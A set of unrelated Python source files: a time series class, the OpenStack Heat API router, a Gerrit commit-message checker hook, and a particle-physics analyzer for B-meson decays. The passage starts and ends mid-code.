time_points, data_points): '''Implements the SizedContainerTimeSeriesInterface using NumPy arrays for storage. Args: `time_points` (sequence): A sequence of time points. Must have length equal to `data_points.` `data_points` (sequence): A sequence of data points. Must have length equal to `time_points.` Returns: ArrayTimeSeries: A time series containing time and data points.''' super().__init__(time_points, data_points) self._length = len(time_points) self._times = np.empty(self._length * 2) self._data = np.empty(self._length * 2) self._times[:self._length] = time_points self._data[:self._length] = data_points def __len__(self): return self._length def __getitem__(self, key): '''Returns the data point from the TimeSeries with index = key''' if key >= self._length: raise IndexError('ArrayTimeSeries index out of range.') return self._data[key] def __setitem__(self, key, value): '''Sets the data point from the TimeSeries with index = key to value''' if key >= self._length: raise IndexError('ArrayTimeSeries index out of range.') self._data[key] = value def __iter__(self): return iter(self._data[:self._length]) def itertimes(self): '''Returns an iterator over the time indices for the ArrayTimeSeries.''' return iter(self._times[:self._length]) def iteritems(self): '''Returns an iterator over the tuples (time, value) for each item in the ArrayTimeSeries.''' return iter(zip(self._times[:self._length], self._data[:self._length])) def __sizeof__(self): '''Returns the size in bytes of the time series storage.''' return sys.getsizeof(self._times) + sys.getsizeof(self._data) class SimulatedTimeSeries(StreamTimeSeriesInterface): '''A time series with no internal storage. Yields data from a supplied generator, either with or without times provided.''' def __init__(self, generator): '''Inits SimulatedTimeSeries with a value or (time,value) generator''' try: self._gen = iter(generator) self._index = 0 except: raise TypeError('Parameter `generator` must be a sequence type.') def __iter__(self): '''Returns an iterator that gets a new value from produce''' return self def __next__(self): '''An iterator that gets a new data point from produce''' return self.produce()[0][1] def iteritems(self): '''An iterator that gets a new (time,value) tuple from produce''' while True: yield self.produce()[0] def itertimes(self): '''An iterator that gets a new time from produce''' while True: yield self.produce()[0][0] def __repr__(self): format_str = '{}([{}])' class_name = type(self).__name__ return format_str.format(class_name, str(self._gen)) def produce(self, chunk = 1): '''Generates a list of up to chunk (time, value) tuples. If optional time is not provided, adds an integer timestamp (Unix time) to value Args: chunk (int): the number of tuples produce generates Returns: list: list of (time, value) tuples.''' values = [] for i in range(chunk): value = next(self._gen) if type(value) == tuple: values.append(value) else: values.append((int(datetime.datetime.now().timestamp()), value)) return values def online_std(self, chunk=1)->StreamTimeSeriesInterface: "Online standard deviation" def gen(): n = 0 mu = 0 dev_accum = 0 for i in range(chunk): tmp = next(self._gen) (time, value) = (tmp[0], tmp[1]) n += 1 delta = value - mu dev_accum=dev_accum+(value-mu)*(value-mu-delta/n) mu = mu + delta/n if n==1: stddev = 0 yield (time, stddev) elif n > 1: stddev = math.sqrt(dev_accum/(n-1)) yield (time, stddev) return SimulatedTimeSeries(gen()) def online_mean(self, chunk=1)->StreamTimeSeriesInterface: "Online mean" def gen(): n = 0 mu = 0 for i in range(chunk): tmp = next(self._gen) (time, value) = (tmp[0], tmp[1]) n += 1 delta = value - mu mu = mu + delta/n yield (time, mu) return SimulatedTimeSeries(gen())
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import routes import six from heat.api.openstack.v1 import actions from heat.api.openstack.v1 import build_info from heat.api.openstack.v1 import events from heat.api.openstack.v1 import resources from heat.api.openstack.v1 import services from heat.api.openstack.v1 import software_configs from heat.api.openstack.v1 import software_deployments from heat.api.openstack.v1 import stacks from heat.common import wsgi class API(wsgi.Router): """WSGI router for Heat v1 REST API requests.""" def __init__(self, conf, **local_conf): self.conf = conf mapper = routes.Mapper() default_resource = wsgi.Resource(wsgi.DefaultMethodController(), wsgi.JSONRequestDeserializer()) def connect(controller, path_prefix, routes): """Connects list of routes to given controller with path_prefix. This function connects the list of routes to the given controller, prepending the given path_prefix. Then for each URL it finds which request methods aren't handled and configures those to return a 405 error. Finally, it adds a handler for the OPTIONS method to all URLs that returns the list of allowed methods with 204 status code. """ # register the routes with the mapper, while keeping track of which # methods are defined for each URL urls = {} for r in routes: url = path_prefix + r['url'] methods = r['method'] if isinstance(methods, six.string_types): methods = [methods] methods_str = ','.join(methods) mapper.connect(r['name'], url, controller=controller, action=r['action'], conditions={'method': methods_str}) if url not in urls: urls[url] = methods else: urls[url] += methods # now register the missing methods to return 405s, and register # a handler for OPTIONS that returns the list of allowed methods for url, methods in urls.items(): all_methods = ['HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE'] missing_methods = [m for m in all_methods if m not in methods] allowed_methods_str = ','.join(methods) mapper.connect(url, controller=default_resource, action='reject', allowed_methods=allowed_methods_str, conditions={'method': missing_methods}) if 'OPTIONS' not in methods: mapper.connect(url, controller=default_resource, action='options', allowed_methods=allowed_methods_str, conditions={'method': 'OPTIONS'}) # Stacks stacks_resource = stacks.create_resource(conf) connect(controller=stacks_resource, path_prefix='/{tenant_id}', routes=[ # Template handling { 'name': 'template_validate', 'url': '/validate', 'action': 'validate_template', 'method': 'POST' }, { 'name': 'resource_types', 'url': '/resource_types', 'action': 'list_resource_types', 'method': 'GET' }, { 'name': 'resource_schema', 'url': '/resource_types/{type_name}', 'action': 'resource_schema', 'method': 'GET' }, { 'name': 'generate_template', 'url': '/resource_types/{type_name}/template', 'action': 'generate_template', 'method': 'GET' }, { 'name': 'template_versions', 'url': '/template_versions', 'action': 'list_template_versions', 'method': 'GET' }, { 'name': 'template_functions', 'url': '/template_versions/{template_version}' '/functions', 'action': 'list_template_functions', 'method': 'GET' }, # Stack collection { 'name': 'stack_index', 'url': '/stacks', 'action': 'index', 'method': 'GET' }, { 'name': 'stack_create', 'url': '/stacks', 'action': 'create', 'method': 'POST' }, { 'name': 'stack_preview', 'url': '/stacks/preview', 'action': 'preview', 'method': 'POST' }, { 'name': 'stack_detail', 'url': '/stacks/detail', 'action': 'detail', 'method': 'GET' }, # Stack data { 'name': 'stack_lookup', 'url': '/stacks/{stack_name}', 'action': 'lookup', 'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE'] }, # \x3A matches on a colon. # Routes treats : specially in its regexp { 'name': 'stack_lookup', 'url': r'/stacks/{stack_name:arn\x3A.*}', 'action': 'lookup', 'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE'] }, { 'name': 'stack_lookup_subpath', 'url': '/stacks/{stack_name}/' '{path:resources|events|template|actions' '|environment|files}', 'action': 'lookup', 'method': 'GET' }, { 'name': 'stack_lookup_subpath_post', 'url': '/stacks/{stack_name}/' '{path:resources|events|template|actions}', 'action': 'lookup', 'method': 'POST' }, { 'name': 'stack_show', 'url': '/stacks/{stack_name}/{stack_id}', 'action': 'show', 'method': 'GET' }, { 'name': 'stack_lookup', 'url': '/stacks/{stack_name}/{stack_id}/template', 'action': 'template', 'method': 'GET' }, { 'name': 'stack_lookup', 'url': '/stacks/{stack_name}/{stack_id}/environment', 'action': 'environment', 'method': 'GET' }, { 'name': 'stack_lookup', 'url': '/stacks/{stack_name}/{stack_id}/files', 'action': 'files', 'method': 'GET' }, # Stack update/delete { 'name': 'stack_update', 'url': '/stacks/{stack_name}/{stack_id}', 'action': 'update', 'method': 'PUT' }, { 'name': 'stack_update_patch', 'url': '/stacks/{stack_name}/{stack_id}', 'action': 'update_patch', 'method': 'PATCH' }, { 'name': 'preview_stack_update', 'url': '/stacks/{stack_name}/{stack_id}/preview', 'action': 'preview_update', 'method': 'PUT' }, { 'name': 'preview_stack_update_patch', 'url': '/stacks/{stack_name}/{stack_id}/preview', 'action': 'preview_update_patch', 'method': 'PATCH' }, { 'name': 'stack_delete', 'url': '/stacks/{stack_name}/{stack_id}', 'action': 'delete', 'method': 'DELETE' }, # Stack abandon { 'name': 'stack_abandon', 'url': '/stacks/{stack_name}/{stack_id}/abandon', 'action': 'abandon', 'method': 'DELETE' }, { 'name': 'stack_export', 'url': '/stacks/{stack_name}/{stack_id}/export', 'action': 'export', 'method': 'GET' }, { 'name': 'stack_snapshot', 'url': '/stacks/{stack_name}/{stack_id}/snapshots', 'action': 'snapshot', 'method': 'POST' }, { 'name': 'stack_snapshot_show', 'url': '/stacks/{stack_name}/{stack_id}/snapshots/' '{snapshot_id}', 'action': 'show_snapshot', 'method': 'GET' }, { 'name': 'stack_snapshot_delete', 'url': '/stacks/{stack_name}/{stack_id}/snapshots/' '{snapshot_id}', 'action': 'delete_snapshot', 'method': 'DELETE' }, { 'name': 'stack_list_snapshots', 'url': '/stacks/{stack_name}/{stack_id}/snapshots', 'action': 'list_snapshots', 'method': 'GET' }, { 'name': 'stack_snapshot_restore', 'url': '/stacks/{stack_name}/{stack_id}/snapshots/' '{snapshot_id}/restore', 'action': 'restore_snapshot', 'method': 'POST' }, # Stack outputs { 'name': 'stack_output_list', 'url': '/stacks/{stack_name}/{stack_id}/outputs', 'action': 'list_outputs', 'method': 'GET' }, { 'name': 'stack_output_show', 'url': '/stacks/{stack_name}/{stack_id}/outputs/' '{output_key}', 'action': 'show_output', 'method': 'GET' } ]) # Resources resources_resource = resources.create_resource(conf) stack_path = '/{tenant_id}/stacks/{stack_name}/{stack_id}' connect(controller=resources_resource, path_prefix=stack_path, routes=[ # Resource collection { 'name': 'resource_index', 'url': '/resources', 'action': 'index', 'method': 'GET' }, # Resource data { 'name': 'resource_show', 'url': '/resources/{resource_name}', 'action': 'show', 'method': 'GET' }, { 'name': 'resource_metadata_show', 'url': '/resources/{resource_name}/metadata', 'action': 'metadata', 'method': 'GET' }, { 'name': 'resource_signal', 'url': '/resources/{resource_name}/signal', 'action': 'signal', 'method': 'POST' }, { 'name': 'resource_mark_unhealthy', 'url': '/resources/{resource_name}', 'action': 'mark_unhealthy', 'method': 'PATCH' } ]) # Events events_resource = events.create_resource(conf) connect(controller=events_resource, path_prefix=stack_path, routes=[ # Stack event collection { 'name': 'event_index_stack', 'url': '/events', 'action': 'index', 'method': 'GET' }, # Resource event collection { 'name': 'event_index_resource', 'url': '/resources/{resource_name}/events', 'action': 'index', 'method': 'GET' }, # Event data { 'name': 'event_show', 'url': '/resources/{resource_name}/events/{event_id}', 'action': 'show', 'method': 'GET' } ]) # Actions actions_resource = actions.create_resource(conf) connect(controller=actions_resource, path_prefix=stack_path, routes=[ { 'name': 'action_stack', 'url': '/actions', 'action': 'action', 'method': 'POST' } ]) # Info info_resource = build_info.create_resource(conf) connect(controller=info_resource, path_prefix='/{tenant_id}', routes=[ { 'name': 'build_info', 'url': '/build_info', 'action': 'build_info', 'method': 'GET' } ]) # Software configs software_config_resource = software_configs.create_resource(conf) connect(controller=software_config_resource, path_prefix='/{tenant_id}/software_configs', routes=[ { 'name': 'software_config_index', 'url': '', 'action': 'index', 'method': 'GET' }, { 'name': 'software_config_create', 'url': '', 'action': 'create', 'method': 'POST' }, { 'name': 'software_config_show', 'url': '/{config_id}', 'action': 'show', 'method': 'GET' }, { 'name': 'software_config_delete', 'url': '/{config_id}', 'action': 'delete', 'method': 'DELETE' } ]) # Software deployments sd_resource = software_deployments.create_resource(conf) connect(controller=sd_resource, path_prefix='/{tenant_id}/software_deployments', routes=[ { 'name': 'software_deployment_index', 'url': '', 'action': 'index', 'method': 'GET' }, { 'name': 'software_deployment_metadata', 'url': '/metadata/{server_id}', 'action': 'metadata', 'method': 'GET' }, { 'name': 'software_deployment_create', 'url': '', 'action': 'create', 'method': 'POST' }, { 'name': 'software_deployment_show', 'url': '/{deployment_id}', 'action': 'show', 'method': 'GET' }, { 'name': 'software_deployment_update', 'url': '/{deployment_id}', 'action': 'update', 'method': 'PUT' }, { 'name': 'software_deployment_delete', 'url': '/{deployment_id}', 'action': 'delete', 'method': 'DELETE' } ]) # Services service_resource = services.create_resource(conf) with mapper.submapper( controller=service_resource, path_prefix='/{tenant_id}/services' ) as sa_mapper: sa_mapper.connect("service_index", "", action="index", conditions={'method': 'GET'}) # now that all the routes are defined, add a handler for super(API, self).__init__(mapper)
#!/usr/bin/env python from __future__ import print_function import subprocess import getopt import sys SSH_USER = 'bot' SSH_HOST = 'localhost' SSH_PORT = 29418 SSH_COMMAND = 'ssh %s@%s -p %d gerrit approve ' % (SSH_USER, SSH_HOST, SSH_PORT) FAILURE_SCORE = '--code-review=-2' FAILURE_MESSAGE = 'This commit message does not match the standard.' \ + ' Please correct the commit message and upload a replacement patch.' PASS_SCORE = '--code-review=0' PASS_MESSAGE = '' def main(): change = None project = None branch = None commit = None patchset = None try: opts, _args = getopt.getopt(sys.argv[1:], '', \ ['change=', 'project=', 'branch=', 'commit=', 'patchset=']) except getopt.GetoptError as err: print('Error: %s' % (err)) usage() sys.exit(-1) for arg, value in opts: if arg == '--change': change = value elif arg == '--project': project = value elif arg == '--branch': branch = value elif arg == '--commit': commit = value elif arg == '--patchset': patchset = value else: print('Error: option %s not recognized' % (arg)) usage() sys.exit(-1) if change == None or project == None or branch == None \ or commit == None or patchset == None: usage() sys.exit(-1) command = 'git cat-file commit %s' % (commit) status, output = subprocess.getstatusoutput(command) if status != 0: print('Error running \'%s\'. status: %s, output:\n\n%s' % \ (command, status, output)) sys.exit(-1) commitMessage = output[(output.find('\n\n')+2):] commitLines = commitMessage.split('\n') if len(commitLines) > 1 and len(commitLines[1]) != 0: fail(commit, 'Invalid commit summary. The summary must be ' \ + 'one line followed by a blank line.') i = 0 for line in commitLines: i = i + 1 if len(line) > 80: fail(commit, 'Line %d is over 80 characters.' % i) passes(commit) def usage(): print('Usage:\n') print(sys.argv[0] + ' --change <change id> --project <project name> ' \ + '--branch <branch> --commit <sha1> --patchset <patchset id>') def fail( commit, message ): command = SSH_COMMAND + FAILURE_SCORE + ' -m \\\"' \ + _shell_escape( FAILURE_MESSAGE + '\n\n' + message) \ + '\\\" ' + commit subprocess.getstatusoutput(command) sys.exit(1) def passes( commit ): command = SSH_COMMAND + PASS_SCORE + ' -m \\\"' \ + _shell_escape(PASS_MESSAGE) + ' \\\" ' + commit subprocess.getstatusoutput(command) def _shell_escape(x): s = '' for c in x: if c in '\n': s = s + '\\\"$\'\\n\'\\\"' else: s = s + c return s if __name__ == '__main__': main()
#!/usr/bin/env python """ Analyzer of B0d -> K*0 Ds+ Ds- events | | |-> pi- pi- pi+ K0L | |-> pi+ pi+ pi- K0L |-> K+ pi- Note: it is supposed to be used within heppy_fcc framework """ import math import time import numpy from heppy_fcc.utility.CommonAnalyzer import CommonAnalyzer from heppy_fcc.utility.Particle import Particle class BackgroundBs2DsDsKWithDs2PiPiPiKAnalyzer(CommonAnalyzer): """ Analyzer of B0d -> K*0 Ds+ Ds- background events | | |-> pi- pi- pi+ K0L | |-> pi+ pi+ pi- K0L |-> K+ pi- Inherits from heppy_fcc.utility.CommonAnalyzer. Extends the base class to cover analysis-specific needs """ def __init__(self, cfg_ana, cfg_comp, looper_name): """ Constructor Arguments: cfg_ana: passed to the base class cfg_comp: passed to the base class looper_name: passed to the base class """ super(BackgroundBs2DsDsKWithDs2PiPiPiKAnalyzer, self).__init__(cfg_ana, cfg_comp, looper_name) # MC truth values self.mc_truth_tree.var('n_particles') self.mc_truth_tree.var('event_number') self.mc_truth_tree.var('pv_x') self.mc_truth_tree.var('pv_y') self.mc_truth_tree.var('pv_z') self.mc_truth_tree.var('sv_x') self.mc_truth_tree.var('sv_y') self.mc_truth_tree.var('sv_z') self.mc_truth_tree.var('tv_dplus_x') self.mc_truth_tree.var('tv_dplus_y') self.mc_truth_tree.var('tv_dplus_z') self.mc_truth_tree.var('tv_dminus_x') self.mc_truth_tree.var('tv_dminus_y') self.mc_truth_tree.var('tv_dminus_z') self.mc_truth_tree.var('b_px') self.mc_truth_tree.var('b_py') self.mc_truth_tree.var('b_pz') self.mc_truth_tree.var('kstar_px') self.mc_truth_tree.var('kstar_py') self.mc_truth_tree.var('kstar_pz') self.mc_truth_tree.var('k_px') self.mc_truth_tree.var('k_py') self.mc_truth_tree.var('k_pz') self.mc_truth_tree.var('k_q') self.mc_truth_tree.var('pi_kstar_px') self.mc_truth_tree.var('pi_kstar_py') self.mc_truth_tree.var('pi_kstar_pz') self.mc_truth_tree.var('pi_kstar_q') self.mc_truth_tree.var('dplus_px') self.mc_truth_tree.var('dplus_py') self.mc_truth_tree.var('dplus_pz') self.mc_truth_tree.var('pi1_dplus_px') self.mc_truth_tree.var('pi1_dplus_py') self.mc_truth_tree.var('pi1_dplus_pz') self.mc_truth_tree.var('pi1_dplus_q') self.mc_truth_tree.var('pi2_dplus_px') self.mc_truth_tree.var('pi2_dplus_py') self.mc_truth_tree.var('pi2_dplus_pz') self.mc_truth_tree.var('pi2_dplus_q') self.mc_truth_tree.var('pi3_dplus_px') self.mc_truth_tree.var('pi3_dplus_py') self.mc_truth_tree.var('pi3_dplus_pz') self.mc_truth_tree.var('pi3_dplus_q') self.mc_truth_tree.var('k0_dplus_px') self.mc_truth_tree.var('k0_dplus_py') self.mc_truth_tree.var('k0_dplus_pz') self.mc_truth_tree.var('dminus_px') self.mc_truth_tree.var('dminus_py') self.mc_truth_tree.var('dminus_pz') self.mc_truth_tree.var('pi1_dminus_px') self.mc_truth_tree.var('pi1_dminus_py') self.mc_truth_tree.var('pi1_dminus_pz') self.mc_truth_tree.var('pi1_dminus_q') self.mc_truth_tree.var('pi2_dminus_px') self.mc_truth_tree.var('pi2_dminus_py') self.mc_truth_tree.var('pi2_dminus_pz') self.mc_truth_tree.var('pi2_dminus_q') self.mc_truth_tree.var('pi3_dminus_px') self.mc_truth_tree.var('pi3_dminus_py') self.mc_truth_tree.var('pi3_dminus_pz') self.mc_truth_tree.var('pi3_dminus_q') self.mc_truth_tree.var('k0_dminus_px') self.mc_truth_tree.var('k0_dminus_py') self.mc_truth_tree.var('k0_dminus_pz') def process(self, event): """ Overriden base class function Processes the event Arguments: event: unused """ b = None # B particle kstar = None # K* from B decay k = None # K from K* decay pi_kstar = None # pi from K* decay dplus= None # Ds+ from Bs decay dminus = None # Ds- from Bs decay pi1_dplus = None # pi from Ds+ decay pi2_dplus = None # pi from Ds+ decay pi3_dplus = None # pi from Ds+ decay k0_dplus = None # pi0 from Ds+ decay pi1_dminus = None # pi from Ds- decay pi2_dminus = None # pi from Ds- decay pi3_dminus = None # pi from Ds- decay k0_dminus = None # pi0 from Ds- decay pv = None # primary vertex sv = None # secondary vertex tv_dplus = None # tau+ decay vertex tv_dminus = None # tau- decay vertex pvsv_distance = 0. # distance between PV and SV pb = 0. # B momentum max_svtv_distance = 0. # maximal distance between SV and TV event_info = event.input.get("EventInfo") particles_info = event.input.get("GenParticle") event_number = event_info.at(0).Number() ptcs = list(map(Particle.fromfccptc, particles_info)) n_particles = len(ptcs) # looking for B for ptc_gen1 in ptcs: if abs(ptc_gen1.pdgid) == 531 and ptc_gen1.start_vertex != ptc_gen1.end_vertex: # if B0s found and it's not an oscillation self.counter += 1 if self.counter % 100 == 0: print('Processing decay #{} ({:.1f} decays / s)'.format(self.counter, 100. / (time.time() - self.last_timestamp))) self.last_timestamp = time.time() b = ptc_gen1 pb = b.p.absvalue() if pb > 25.: # Select only events with large momentum of the B self.pb_counter += 1 pv = b.start_vertex sv = b.end_vertex pvsv_distance = math.sqrt((sv.x - pv.x) ** 2 + (sv.y - pv.y) ** 2 + (sv.z - pv.z) ** 2) if pvsv_distance > 1.: # Select only events with long flight distance of the B self.pvsv_distance_counter += 1 for ptc_gen2 in ptcs: if ptc_gen2.start_vertex == b.end_vertex: # looking for Ds+ if ptc_gen2.pdgid == 431: dplus = ptc_gen2 tv_dplus = dplus.end_vertex # looking for Ds- if ptc_gen2.pdgid == -431: dminus = ptc_gen2 tv_dminus = dminus.end_vertex # looking for K* if abs(ptc_gen2.pdgid) == 313: kstar = ptc_gen2 max_svtv_distance = max(math.sqrt((tv_dplus.x - sv.x) ** 2 + (tv_dplus.y - sv.y) ** 2 + (tv_dplus.z - sv.z) ** 2), math.sqrt((tv_dminus.x - sv.x) ** 2 + (tv_dminus.y - sv.y) ** 2 + (tv_dminus.z - sv.z) ** 2)) if max_svtv_distance > 0.5: # select only events with long flight distance of tau self.max_svtv_distance_counter += 1 pis_dplus = [] pis_dminus = [] for ptc_gen3 in ptcs: if ptc_gen3.start_vertex == kstar.end_vertex: # looking for K if abs(ptc_gen3.pdgid) == 321: k = ptc_gen3 # looking for pi if abs(ptc_gen3.pdgid) == 211: pi_kstar = ptc_gen3 if ptc_gen3.start_vertex == dplus.end_vertex: # looking for pi+/- if abs(ptc_gen3.pdgid) == 211: pis_dplus.append(ptc_gen3) # looking for K0L if ptc_gen3.pdgid == 130: k0_dplus = ptc_gen3 if ptc_gen3.start_vertex == dminus.end_vertex: # looking for pi+/- if abs(ptc_gen3.pdgid) == 211: pis_dminus.append(ptc_gen3) # looking for K0L if ptc_gen3.pdgid == 130: k0_dminus = ptc_gen3 if len(pis_dplus) == 3: pi1_dplus, pi2_dplus, pi3_dplus = pis_dplus[0], pis_dplus[1], pis_dplus[2] if len(pis_dminus) == 3: pi1_dminus, pi2_dminus, pi3_dminus = pis_dminus[0], pis_dminus[1], pis_dminus[2] # filling histograms self.pvsv_distance_hist.Fill(pvsv_distance) self.pb_hist.Fill(pb) self.max_svtv_distance_hist.Fill(max_svtv_distance) # filling MC truth information self.mc_truth_tree.fill('event_number', event_number) self.mc_truth_tree.fill('n_particles', n_particles) self.mc_truth_tree.fill('pv_x', pv.x) self.mc_truth_tree.fill('pv_y', pv.y) self.mc_truth_tree.fill('pv_z', pv.z) self.mc_truth_tree.fill('sv_x', sv.x) self.mc_truth_tree.fill('sv_y', sv.y) self.mc_truth_tree.fill('sv_z', sv.z) self.mc_truth_tree.fill('tv_dplus_x', tv_dplus.x) self.mc_truth_tree.fill('tv_dplus_y', tv_dplus.y) self.mc_truth_tree.fill('tv_dplus_z', tv_dplus.z) self.mc_truth_tree.fill('tv_dminus_x', tv_dminus.x) self.mc_truth_tree.fill('tv_dminus_y', tv_dminus.y) self.mc_truth_tree.fill('tv_dminus_z', tv_dminus.z) self.mc_truth_tree.fill('b_px', b.p.px) self.mc_truth_tree.fill('b_py', b.p.py) self.mc_truth_tree.fill('b_pz', b.p.pz) self.mc_truth_tree.fill('kstar_px', kstar.p.px) self.mc_truth_tree.fill('kstar_py', kstar.p.py) self.mc_truth_tree.fill('kstar_pz', kstar.p.pz) self.mc_truth_tree.fill('k_q', k.charge) self.mc_truth_tree.fill('k_px', k.p.px) self.mc_truth_tree.fill('k_py', k.p.py) self.mc_truth_tree.fill('k_pz', k.p.pz) self.mc_truth_tree.fill('pi_kstar_q', pi_kstar.charge) self.mc_truth_tree.fill('pi_kstar_px', pi_kstar.p.px) self.mc_truth_tree.fill('pi_kstar_py', pi_kstar.p.py) self.mc_truth_tree.fill('pi_kstar_pz', pi_kstar.p.pz) self.mc_truth_tree.fill('dplus_px', dplus.p.px) self.mc_truth_tree.fill('dplus_py', dplus.p.py) self.mc_truth_tree.fill('dplus_pz', dplus.p.pz) self.mc_truth_tree.fill('pi1_dplus_q', pi1_dplus.charge) self.mc_truth_tree.fill('pi1_dplus_px', pi1_dplus.p.px) self.mc_truth_tree.fill('pi1_dplus_py', pi1_dplus.p.py) self.mc_truth_tree.fill('pi1_dplus_pz', pi1_dplus.p.pz) self.mc_truth_tree.fill('pi2_dplus_q', pi2_dplus.charge) self.mc_truth_tree.fill('pi2_dplus_px', pi2_dplus.p.px) self.mc_truth_tree.fill('pi2_dplus_py', pi2_dplus.p.py) self.mc_truth_tree.fill('pi2_dplus_pz', pi2_dplus.p.pz) self.mc_truth_tree.fill('pi3_dplus_q', pi3_dplus.charge) self.mc_truth_tree.fill('pi3_dplus_px', pi3_dplus.p.px) self.mc_truth_tree.fill('pi3_dplus_py', pi3_dplus.p.py) self.mc_truth_tree.fill('pi3_dplus_pz', pi3_dplus.p.pz) self.mc_truth_tree.fill('k0_dplus_px', k0_dplus.p.px) self.mc_truth_tree.fill('k0_dplus_py', k0_dplus.p.py) self.mc_truth_tree.fill('k0_dplus_pz', k0_dplus.p.pz) self.mc_truth_tree.fill('dminus_px', dminus.p.px) self.mc_truth_tree.fill('dminus_py', dminus.p.py) self.mc_truth_tree.fill('dminus_pz', dminus.p.pz) self.mc_truth_tree.fill('pi1_dminus_q', pi1_dminus.charge) self.mc_truth_tree.fill('pi1_dminus_px', pi1_dminus.p.px) self.mc_truth_tree.fill('pi1_dminus_py', pi1_dminus.p.py) self.mc_truth_tree.fill('pi1_dminus_pz', pi1_dminus.p.pz) self.mc_truth_tree.fill('pi2_dminus_q', pi2_dminus.charge) self.mc_truth_tree.fill('pi2_dminus_px', pi2_dminus.p.px) self.mc_truth_tree.fill('pi2_dminus_py', pi2_dminus.p.py) self.mc_truth_tree.fill('pi2_dminus_pz', pi2_dminus.p.pz) self.mc_truth_tree.fill('pi3_dminus_q', pi3_dminus.charge) self.mc_truth_tree.fill('pi3_dminus_px', pi3_dminus.p.px) self.mc_truth_tree.fill('pi3_dminus_py', pi3_dminus.p.py) self.mc_truth_tree.fill('pi3_dminus_pz', pi3_dminus.p.pz) self.mc_truth_tree.fill('k0_dminus_px', k0_dminus.p.px) self.mc_truth_tree.fill('k0_dminus_py', k0_dminus.p.py) self.mc_truth_tree.fill('k0_dminus_pz', k0_dminus.p.pz) self.mc_truth_tree.tree.Fill() # matching visible particles and MC truth ones tv_tauplus = tv_dplus pi1_tauplus = pi1_dplus pi2_tauplus = pi2_dplus pi3_tauplus = pi3_dplus tv_tauminus = tv_dminus pi1_tauminus = pi1_dminus pi2_tauminus = pi2_dminus pi3_tauminus = pi3_dminus # filling event information self.tree.fill('event_number', event_number) self.tree.fill('n_particles', n_particles) self.tree.fill('pv_x', numpy.random.normal(pv.x, self.cfg_ana.pv_x_resolution) if self.cfg_ana.smear_pv else pv.x) self.tree.fill('pv_y', numpy.random.normal(pv.y, self.cfg_ana.pv_y_resolution) if self.cfg_ana.smear_pv else pv.y) self.tree.fill('pv_z', numpy.random.normal(pv.z, self.cfg_ana.pv_z_resolution) if self.cfg_ana.smear_pv else pv.z) self.tree.fill('sv_x', numpy.random.normal(sv.x, self.cfg_ana.sv_x_resolution) if self.cfg_ana.smear_sv else sv.x) self.tree.fill('sv_y', numpy.random.normal(sv.y, self.cfg_ana.sv_y_resolution) if self.cfg_ana.smear_sv else sv.y) self.tree.fill('sv_z', numpy.random.normal(sv.z, self.cfg_ana.sv_z_resolution) if self.cfg_ana.smear_sv else sv.z) self.tree.fill('tv_tauplus_x', numpy.random.normal(tv_tauplus.x, self.cfg_ana.tv_x_resolution) if self.cfg_ana.smear_tv else tv_tauplus.x) self.tree.fill('tv_tauplus_y', numpy.random.normal(tv_tauplus.y, self.cfg_ana.tv_y_resolution) if self.cfg_ana.smear_tv else tv_tauplus.y) self.tree.fill('tv_tauplus_z', numpy.random.normal(tv_tauplus.z, self.cfg_ana.tv_z_resolution) if self.cfg_ana.smear_tv else tv_tauplus.z) self.tree.fill('tv_tauminus_x', numpy.random.normal(tv_tauminus.x, self.cfg_ana.tv_x_resolution) if self.cfg_ana.smear_tv else tv_tauminus.x) self.tree.fill('tv_tauminus_y', numpy.random.normal(tv_tauminus.y, self.cfg_ana.tv_y_resolution) if self.cfg_ana.smear_tv else tv_tauminus.y) self.tree.fill('tv_tauminus_z', numpy.random.normal(tv_tauminus.z, self.cfg_ana.tv_z_resolution) if self.cfg_ana.smear_tv else tv_tauminus.z) self.tree.fill('pi1_tauplus_q', pi1_tauplus.charge) self.tree.fill('pi1_tauplus_px', numpy.random.normal(pi1_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.px) self.tree.fill('pi1_tauplus_py', numpy.random.normal(pi1_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.py) self.tree.fill('pi1_tauplus_pz', numpy.random.normal(pi1_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi1_tauplus.p.pz) self.tree.fill('pi2_tauplus_q', pi2_tauplus.charge) self.tree.fill('pi2_tauplus_px', numpy.random.normal(pi2_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.px) self.tree.fill('pi2_tauplus_py', numpy.random.normal(pi2_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.py) self.tree.fill('pi2_tauplus_pz', numpy.random.normal(pi2_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi2_tauplus.p.pz) self.tree.fill('pi3_tauplus_q', pi3_tauplus.charge) self.tree.fill('pi3_tauplus_px', numpy.random.normal(pi3_tauplus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.px) self.tree.fill('pi3_tauplus_py', numpy.random.normal(pi3_tauplus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.py) self.tree.fill('pi3_tauplus_pz', numpy.random.normal(pi3_tauplus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum else pi3_tauplus.p.pz) self.tree.fill('pi1_tauminus_q', pi1_tauminus.charge) self.tree.fill('pi1_tauminus_px', numpy.random.normal(pi1_tauminus.p.px, self.cfg_ana.momentum_x_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.px) self.tree.fill('pi1_tauminus_py', numpy.random.normal(pi1_tauminus.p.py, self.cfg_ana.momentum_y_resolution) if self.cfg_ana.smear_momentum else pi1_tauminus.p.py) self.tree.fill('pi1_tauminus_pz', numpy.random.normal(pi1_tauminus.p.pz, self.cfg_ana.momentum_z_resolution) if self.cfg_ana.smear_momentum 